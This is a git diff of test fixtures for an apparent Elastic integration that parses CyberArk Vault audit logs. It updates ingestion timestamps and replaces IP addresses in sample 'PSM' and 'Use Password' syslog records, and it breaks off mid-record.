System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}",
 "code": "302",
 "kind": "event",
 "action": "psm disconnect",
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json
index 7f3955607f7..a67cff14a59 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json
@@ -65,7 +65,7 @@
 "event": {
 "severity": 2,
 "action": "psm upload recording",
- "ingested": "2021-06-09T10:24:32.315195700Z",
+ "ingested": "2021-12-09T13:36:52.241443500Z",
 "original": "\u003c5\u003e1 2021-03-25T09:20:56Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 05:20:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T09:20:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e304\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Upload Recording\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_COMP01\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Upload Recording\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\a4636750-50a2-492e-984c-e08743d8a883.SSH.txt\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eDstHost=rhel7.cybr.com;LogonAccount=logon;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:46;SessionID=a4636750-50a2-492e-984c-e08743d8a883;SrcHost=127.0.0.1;User=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Upload Recording\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 
05:20:56\",\"IsoTimestamp\":\"2021-03-25T09:20:56Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"304\",\"Desc\":\"PSM Upload Recording\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_COMP01\",\"Action\":\"PSM Upload Recording\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"Root\\\\a4636750-50a2-492e-984c-e08743d8a883.SSH.txt\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"DstHost=rhel7.cybr.com;LogonAccount=logon;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:46;SessionID=a4636750-50a2-492e-984c-e08743d8a883;SrcHost=127.0.0.1;User=root;\",\"Message\":\"PSM Upload Recording\",\"GatewayStation\":\"\"}}}",
 "code": "304",
 "kind": "event"
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log
index 8c77aabf909..3f7c5f3a332 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log
@@ -1,11 +1,11 @@
 {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 308\n Use Password\n Info\n adm2\n Use Password\n \n \n Windows\n Root\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\n 10.2.0.6\n \n \n \n (Action: Connect)\n \n Use Password\n 10.2.0.3\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"308","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"Use Password","Severity":"Info","Issuer":"adm2","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"Windows","File":"Root\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2","Station":"10.2.0.6","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)","ExtraDetails":"","Message":"Use Password","GatewayStation":"10.2.0.3","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WIN-SERVER-LOCAL"},{"Name":"UserName","Value":"Administrator2"},{"Name":"Address","Value":"dbserver.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"LogonDomain","Value":"DBServer"},{"Name":"SequenceID","Value":"1"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"success"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"LastSuccessReconciliation","Value":"1604944215"},{"Name":"Customer","Value":"EvilCorp"}]}}}}
-<5>1 2021-03-11T17:38:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:12\n 2021-03-11T17:38:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n fun and profit\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
09:38:12","IsoTimestamp":"2021-03-11T17:38:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:46:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:49\n 2021-03-11T17:46:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n FOR FUN.\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:49","IsoTimestamp":"2021-03-11T17:46:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"FOR FUN.","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:48:27Z 
VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:27\n 2021-03-11T17:48:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n For fun and profit\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:27","IsoTimestamp":"2021-03-11T17:48:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"For fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:54:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:49\n 2021-03-11T17:54:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n Because I say so\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:49","IsoTimestamp":"2021-03-11T17:54:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"Because I say so","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:56:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:30\n 2021-03-11T17:56:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n for fun\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:30","IsoTimestamp":"2021-03-11T17:56:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"for fun","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T20:23:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:17\n 2021-03-11T20:23:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n testing\n \n 
Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:17","IsoTimestamp":"2021-03-11T20:23:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"testing","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use 
Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:31:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:54\n 2021-03-15T10:31:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:54","IsoTimestamp":"2021-03-15T10:31:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use 
Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T14:08:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:26\n 2021-03-15T14:08:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:26","IsoTimestamp":"2021-03-15T14:08:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
-<5>1 2021-03-16T10:04:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:49\n 2021-03-16T10:04:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:49","IsoTimestamp":"2021-03-16T10:04:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
+<5>1 2021-03-11T17:38:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:12\n 2021-03-11T17:38:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n fun and profit\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:12","IsoTimestamp":"2021-03-11T17:38:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:46:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:49\n 2021-03-11T17:46:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n FOR FUN.\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:49","IsoTimestamp":"2021-03-11T17:46:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use 
Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"FOR FUN.","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:48:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:27\n 2021-03-11T17:48:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n For fun and profit\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:27","IsoTimestamp":"2021-03-11T17:48:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"For fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:54:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:49\n 2021-03-11T17:54:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use 
Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n Because I say so\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:49","IsoTimestamp":"2021-03-11T17:54:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"Because I say so","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:56:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:30\n 2021-03-11T17:56:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n for fun\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:30","IsoTimestamp":"2021-03-11T17:56:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"for fun","ExtraDetails":"","Message":"Use 
Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T20:23:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:17\n 2021-03-11T20:23:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 10.0.2.2\n \n \n \n testing\n \n Use Password\n 67.43.156.13\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:17","IsoTimestamp":"2021-03-11T20:23:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"testing","ExtraDetails":"","Message":"Use 